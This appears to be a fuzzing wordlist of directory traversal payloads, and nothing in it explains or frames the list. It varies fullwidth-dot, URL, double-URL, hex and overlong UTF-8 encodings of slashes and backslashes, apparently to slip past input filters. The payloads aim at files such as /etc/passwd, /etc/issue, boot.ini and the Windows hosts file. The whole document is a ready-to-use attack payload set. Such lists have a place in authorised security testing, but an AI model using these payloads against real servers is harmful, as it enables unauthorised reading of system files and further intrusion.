-%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/passwd -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/issue -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/boot.ini -%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/windows/system32/drivers/etc/hosts -%uff0e%uff0e\etc\passwd -%uff0e%uff0e\etc\issue -%uff0e%uff0e\boot.ini -%uff0e%uff0e\windows\system32\drivers\etc\hosts -%uff0e%uff0e\%uff0e%uff0e\etc\passwd -%uff0e%uff0e\%uff0e%uff0e\etc\issue -%uff0e%uff0e\%uff0e%uff0e\boot.ini -%uff0e%uff0e\%uff0e%uff0e\windows\system32\drivers\etc\hosts -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\etc\passwd -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\etc\issue -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\boot.ini -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\windows\system32\drivers\etc\hosts -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\etc\passwd -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\etc\issue -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\boot.ini -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\windows\system32\drivers\etc\hosts -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\etc\passwd -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\etc\issue -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\boot.ini -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\windows\system32\drivers\etc\hosts -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\etc\passwd -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\etc\issue -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\boot.ini -%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\windows\system32\drivers\etc\hosts -%uff0e%uff0e%2fetc%2fpasswd -%uff0e%uff0e%2fetc%2fissue -%uff0e%uff0e%2fboot.ini -%uff0e%uff0e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%uff0e%uff0e%2f%uff0e%uff0e%2fetc%2fpasswd -%uff0e%uff0e%2f%uff0e%uff0e%2fetc%2fissue -%uff0e%uff0e%2f%uff0e%uff0e%2fboot.ini -%uff0e%uff0e%2f%uff0e%uff0e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2fetc%2fpasswd -%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2fetc%2fissue -%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2fboot.ini -%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2fetc%2fpasswd -%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2fetc%2fissue -%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2fboot.ini -%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2fetc%2fpasswd -%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2fetc%2fissue -%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2fboot.ini -%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2fetc%2fpasswd -%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2fetc%2fissue -%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2fboot.ini -%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2f%uff0e%uff0e%2fwindows%2fsystem32%2fdrivers%2fetc%2fhosts -%uff0e%uff0e%5cetc%5cpasswd -%uff0e%uff0e%5cetc%5cissue -%uff0e%uff0e%5cboot.ini -%uff0e%uff0e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%uff0e%uff0e%5c%uff0e%uff0e%5cetc%5cpasswd -%uff0e%uff0e%5c%uff0e%uff0e%5cetc%5cissue -%uff0e%uff0e%5c%uff0e%uff0e%5cboot.ini -%uff0e%uff0e%5c%uff0e%uff0e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5cetc%5cpasswd -%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5cetc%5cissue -%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5cboot.ini -%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5cetc%5cpasswd -%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5cetc%5cissue -%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5cboot.ini -%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5cetc%5cpasswd -%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5cetc%5cissue -%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5cboot.ini -%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5cetc%5cpasswd -%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5cetc%5cissue -%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5cboot.ini -%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5c%uff0e%uff0e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts -%uff0e%uff0e0x2fetc0x2fpasswd -%uff0e%uff0e0x2fetc0x2fissue -%uff0e%uff0e0x2fboot.ini -%uff0e%uff0e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%uff0e%uff0e0x2f%uff0e%uff0e0x2fetc0x2fpasswd -%uff0e%uff0e0x2f%uff0e%uff0e0x2fetc0x2fissue -%uff0e%uff0e0x2f%uff0e%uff0e0x2fboot.ini -%uff0e%uff0e0x2f%uff0e%uff0e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2fetc0x2fpasswd -%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2fetc0x2fissue -%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2fboot.ini -%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2fetc0x2fpasswd -%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2fetc0x2fissue -%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2fboot.ini -%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2fetc0x2fpasswd -%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2fetc0x2fissue -%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2fboot.ini -%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2fetc0x2fpasswd -%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2fetc0x2fissue -%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2fboot.ini -%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2f%uff0e%uff0e0x2fwindows0x2fsystem320x2fdrivers0x2fetc0x2fhosts -%uff0e%uff0e0x5cetc0x5cpasswd -%uff0e%uff0e0x5cetc0x5cissue -%uff0e%uff0e0x5cboot.ini -%uff0e%uff0e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%uff0e%uff0e0x5c%uff0e%uff0e0x5cetc0x5cpasswd -%uff0e%uff0e0x5c%uff0e%uff0e0x5cetc0x5cissue -%uff0e%uff0e0x5c%uff0e%uff0e0x5cboot.ini -%uff0e%uff0e0x5c%uff0e%uff0e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5cetc0x5cpasswd -%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5cetc0x5cissue -%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5cboot.ini -%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5cetc0x5cpasswd -%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5cetc0x5cissue -%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5cboot.ini -%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5cetc0x5cpasswd -%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5cetc0x5cissue -%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5cboot.ini -%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5cetc0x5cpasswd -%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5cetc0x5cissue -%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5cboot.ini -%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5c%uff0e%uff0e0x5cwindows0x5csystem320x5cdrivers0x5cetc0x5chosts -%uff0e%uff0e%252fetc%252fpasswd -%uff0e%uff0e%252fetc%252fissue -%uff0e%uff0e%252fboot.ini -%uff0e%uff0e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%uff0e%uff0e%252f%uff0e%uff0e%252fetc%252fpasswd -%uff0e%uff0e%252f%uff0e%uff0e%252fetc%252fissue -%uff0e%uff0e%252f%uff0e%uff0e%252fboot.ini -%uff0e%uff0e%252f%uff0e%uff0e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252fetc%252fpasswd -%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252fetc%252fissue -%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252fboot.ini -%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252fetc%252fpasswd -%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252fetc%252fissue -%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252fboot.ini -%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252fetc%252fpasswd -%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252fetc%252fissue -%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252fboot.ini -%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252fetc%252fpasswd -%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252fetc%252fissue -%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252fboot.ini -%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252f%uff0e%uff0e%252fwindows%252fsystem32%252fdrivers%252fetc%252fhosts -%uff0e%uff0e%255cetc%255cpasswd -%uff0e%uff0e%255cetc%255cissue -%uff0e%uff0e%255cboot.ini -%uff0e%uff0e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%uff0e%uff0e%255c%uff0e%uff0e%255cetc%255cpasswd -%uff0e%uff0e%255c%uff0e%uff0e%255cetc%255cissue -%uff0e%uff0e%255c%uff0e%uff0e%255cboot.ini -%uff0e%uff0e%255c%uff0e%uff0e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255cetc%255cpasswd -%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255cetc%255cissue -%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255cboot.ini -%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255cetc%255cpasswd -%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255cetc%255cissue -%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255cboot.ini -%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255cetc%255cpasswd -%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255cetc%255cissue -%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255cboot.ini -%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255cetc%255cpasswd -%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255cetc%255cissue -%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255cboot.ini -%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255c%uff0e%uff0e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -%uff0e%uff0e%c0%2fetc%c0%2fpasswd -%uff0e%uff0e%c0%2fetc%c0%2fissue -%uff0e%uff0e%c0%2fboot.ini -%uff0e%uff0e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2fetc%c0%2fpasswd -%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2fetc%c0%2fissue -%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2fboot.ini -%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2fetc%c0%2fpasswd -%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2fetc%c0%2fissue -%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2fboot.ini -%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2fetc%c0%2fpasswd -%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2fetc%c0%2fissue -%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2fboot.ini -%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2fetc%c0%2fpasswd -%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2fetc%c0%2fissue -%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2fboot.ini -%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2fetc%c0%2fpasswd -%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2fetc%c0%2fissue -%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2fboot.ini -%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2f%uff0e%uff0e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -%uff0e%uff0e%c0%afetc%c0%afpasswd -%uff0e%uff0e%c0%afetc%c0%afissue -%uff0e%uff0e%c0%afboot.ini -%uff0e%uff0e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%uff0e%uff0e%c0%af%uff0e%uff0e%c0%afetc%c0%afpasswd -%uff0e%uff0e%c0%af%uff0e%uff0e%c0%afetc%c0%afissue -%uff0e%uff0e%c0%af%uff0e%uff0e%c0%afboot.ini -%uff0e%uff0e%c0%af%uff0e%uff0e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%afetc%c0%afpasswd -%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%afetc%c0%afissue -%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%afboot.ini -%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%afetc%c0%afpasswd -%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%afetc%c0%afissue -%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%afboot.ini -%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%afetc%c0%afpasswd -%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%afetc%c0%afissue -%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%afboot.ini -%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%afetc%c0%afpasswd -%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%afetc%c0%afissue -%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%afboot.ini -%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%af%uff0e%uff0e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -%uff0e%uff0e%c0%5cetc%c0%5cpasswd -%uff0e%uff0e%c0%5cetc%c0%5cissue -%uff0e%uff0e%c0%5cboot.ini -%uff0e%uff0e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5cetc%c0%5cpasswd -%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5cetc%c0%5cissue -%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5cboot.ini -%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5cetc%c0%5cpasswd -%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5cetc%c0%5cissue -%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5cboot.ini -%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5cetc%c0%5cpasswd -%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5cetc%c0%5cissue -%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5cboot.ini -%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5cetc%c0%5cpasswd -%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5cetc%c0%5cissue -%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5cboot.ini -%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5c%uff0e%uff0e%c0%5cetc%c0%5cpasswd 